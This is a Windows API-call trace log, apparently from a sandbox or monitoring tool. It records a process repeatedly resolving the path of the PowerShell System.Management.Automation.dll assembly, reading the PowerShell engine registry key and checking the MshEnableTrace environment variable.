	[0056.608] GetLastError () returned 0xcb
	[0056.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df78, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.609] GetLastError () returned 0xcb
	[0056.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.609] GetLastError () returned 0xcb
	[0056.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.609] GetLastError () returned 0xcb
	[0056.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df8c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.609] GetLastError () returned 0xcb
	[0056.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.609] GetLastError () returned 0xcb
	[0056.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.609] GetLastError () returned 0xcb
	[0056.610] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e49c | out: phkResult=0x22e49c*=0x36c) returned 0x0
	[0056.610] RegQueryValueExW (in: hKey=0x36c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e4e4, lpData=0x0, lpcbData=0x22e4e0*=0x0 | out: lpType=0x22e4e4*=0x1, lpData=0x0, lpcbData=0x22e4e0*=0x56) returned 0x0
	[0056.610] RegQueryValueExW (in: hKey=0x36c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e4e4, lpData=0x3c3520, lpcbData=0x22e4e0*=0x56 | out: lpType=0x22e4e4*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22e4e0*=0x56) returned 0x0
	[0056.610] RegCloseKey (hKey=0x36c) returned 0x0
	[0056.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df8c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.610] GetLastError () returned 0xcb
	[0056.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.610] GetLastError () returned 0xcb
	[0056.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.611] GetLastError () returned 0xcb
	[0056.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.611] GetLastError () returned 0xcb
	[0056.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.611] GetLastError () returned 0xcb
	[0056.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22df24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.611] GetLastError () returned 0xcb
	[0056.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.619] GetLastError () returned 0xcb
	[0056.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.620] GetLastError () returned 0xcb
	[0056.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.620] GetLastError () returned 0xcb
	[0056.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.620] GetLastError () returned 0xcb
	[0056.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.620] GetLastError () returned 0xcb
	[0056.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.620] GetLastError () returned 0xcb
	[0056.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.620] GetLastError () returned 0xcb
	[0056.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.620] GetLastError () returned 0xcb
	[0056.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.621] GetLastError () returned 0xcb
	[0056.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.621] GetLastError () returned 0xcb
	[0056.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.621] GetLastError () returned 0xcb
	[0056.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.621] GetLastError () returned 0xcb
	[0056.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.621] GetLastError () returned 0xcb
	[0056.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.621] GetLastError () returned 0xcb
	[0056.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.621] GetLastError () returned 0xcb
	[0056.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.621] GetLastError () returned 0xcb
	[0056.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.621] GetLastError () returned 0xcb
	[0056.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.622] GetLastError () returned 0xcb
	[0056.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.622] GetLastError () returned 0xcb
	[0056.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.622] GetLastError () returned 0xcb
	[0056.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.622] GetLastError () returned 0xcb
	[0056.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.622] GetLastError () returned 0xcb
	[0056.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.622] GetLastError () returned 0xcb
	[0056.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.622] GetLastError () returned 0xcb
	[0056.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.622] GetLastError () returned 0xcb
	[0056.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.622] GetLastError () returned 0xcb
	[0056.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.622] GetLastError () returned 0xcb
	[0056.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.622] GetLastError () returned 0xcb
	[0056.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.623] GetLastError () returned 0xcb
	[0056.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.623] GetLastError () returned 0xcb
	[0056.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.623] GetLastError () returned 0xcb
	[0056.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.623] GetLastError () returned 0xcb
	[0056.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.623] GetLastError () returned 0xcb
	[0056.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.623] GetLastError () returned 0xcb
	[0056.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.623] GetLastError () returned 0xcb
	[0056.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.623] GetLastError () returned 0xcb
	[0056.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.623] GetLastError () returned 0xcb
	[0056.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.623] GetLastError () returned 0xcb
	[0056.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.624] GetLastError () returned 0xcb
	[0056.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.624] GetLastError () returned 0xcb
	[0056.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.624] GetLastError () returned 0xcb
	[0056.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.624] GetLastError () returned 0xcb
	[0056.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.624] GetLastError () returned 0xcb
	[0056.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.624] GetLastError () returned 0xcb
	[0056.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.624] GetLastError () returned 0xcb
	[0056.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.624] GetLastError () returned 0xcb
	[0056.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.624] GetLastError () returned 0xcb
	[0056.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.624] GetLastError () returned 0xcb
